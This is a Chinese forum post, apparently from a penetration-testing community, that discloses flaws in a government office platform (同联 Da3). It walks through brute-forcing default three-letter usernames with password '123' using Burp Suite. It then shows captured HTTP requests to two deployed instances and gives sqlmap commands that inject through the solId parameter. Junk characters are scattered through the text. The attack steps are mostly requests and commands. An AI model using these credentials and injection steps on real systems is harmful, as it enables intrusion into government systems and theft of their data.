8 O. P: b1 a5 ]# b
' [8 ]. P3 O) ` d y7 @8 U 平台简介: A$ j2 Q ^" L; ]) N6 c
% o! q; w+ u. x5 M, p: E
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
3 Y! e. e* v6 l3 K7 }( L
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!# R7 `2 X0 A0 N. X5 [+ H- }
% c5 {5 b; Y9 R7 G5 j# w7 X . m4 P0 T7 B7 n* j
3 y* m. o7 X4 p 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
7 l% O4 L6 l; a0 H4 W$ a! b7 w& t# V/ ?9 d& g t' Z
0 f7 A8 K# |7 k+ H( j; v# g' @ http://1.1.1.1:7197/cap-aco/#(案例2-)" o& a. u; O) g3 r1 d8 ^
* [* r3 k3 |# \3 r http://www.XXOO.com (案例1-官网网站); k4 D! ^9 j1 p! Z" W7 ]3 a+ O; d
, O+ T# T7 H6 F1 g: A/ X, s3 M 3 v& E3 h3 }3 B& _
3 j, w" i1 V7 L( `; ~9 d+ w 漏洞详情:5 x) q! {) T2 g
& l6 c' l4 j8 \% @ 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:; O- |" P8 \3 J7 M7 ~
$ K) ^1 Z8 p5 a
" O- i. j- i; D+ w }! ^* f/ [+ e 0 m' N! L2 X7 w6 O+ I1 P) ~" c
, C+ L" t* Z% a. Q5 Y4 [5 v2 W4 s c- x status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:9 x! N! ]# M* U) X; @% r
9 E& g# K- p) N1 h3 m 1、案例1-官方网站+ [" I/ A$ ]3 s* d# d8 Z- m( ]" Z* Q& w
* R# ?) T1 p1 g5 X& p6 S GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
. h2 P6 j9 S0 ^, ~! P! \ Host: www.XXOO.com1 B3 f: t, y2 `/ N+ l
1 q L ?' b2 k, N Proxy-Connection: Keep-Alive" H+ K4 M9 p c9 ?$ d
: R [% `; F' l& U" m; |& T Accept: application/json, text/javascript, */*; q=0.01
) S* T. z1 l1 i/ i7 _. x& g Accept-Language: zh-CN
. v% d) T3 y' J* \: _, S* n, N, e$ H0 z: m! `6 }! X Content-Type: application/json4 ?, `9 U, X3 W, }, E$ d
6 M" I4 e" w' e" o6 p8 L' [7 c User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
) B! l; s3 ^ E z R; A X-Requested-With: XMLHttpRequest! h6 r- Y0 S- B0 z# I* I. F) A
5 w- L) c8 N) B2 c* ^/ j6 z Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002+ H5 q3 n3 s/ _' a' M
! t) @' Q+ k9 {( x* m4 k! `! K( [$ _9 u/ @0 a" j; S5 E8 V5 m, W( y Accept-Encoding: gzip, deflate, sdch
- S" M- p6 _) I8 l& t! @Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
# i; F [4 h4 N& b 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:# o7 H* y$ M4 L8 J. J( D" C
6 { r- U7 f) \" |& }" U: @+ g8 c! Z1 i) \6 w
9 t! A$ A7 T: L" ^0 T0 ~2 e1 z/ _ [
, Y3 I# m- ] D( b 2、案例2-某天河云平台
% B$ } n3 T4 v" w' |5 j& U4 x2 T" @9 n7 }: i0 A! K$ M GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1+ N) Z/ {5 p* U, S
Host: 1.1.1.:7197
* I; ~% ~: n) ^5 R6 L3 z& O Accept: application/json, text/javascript, */*; q=0.01. z3 W) t& D9 m, n% w0 b
, ?. A2 D5 f, ]+ D6 }. D% X3 S7 I X-Requested-With: XMLHttpRequest
; D0 x( G& Z4 h3 m/ v$ _8 K; p3 ~( A! I* G7 Q0 B( Q, Y% a User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0: h; e2 G8 d+ {" D. G5 f
Content-Type: application/json3 V, ~, q7 q$ ^& `9 E8 N. y
http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
/ w3 J# Q, o) `9 D Referer:6 c" e; B& Q6 X: a n/ J Accept-Language: zh-CN,zh;q=0.8
/ r7 k% E$ M1 D% l2 w Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
- k, p- m/ b& A; H* T Connection: close
) q; X2 b# h: E6 e 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
4 c8 e, \; U0 v C) X" ^! ~& m 6 i; @% [9 }0 O) u
# d& F! v" f' G. y2 _4 [* L* U. B
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |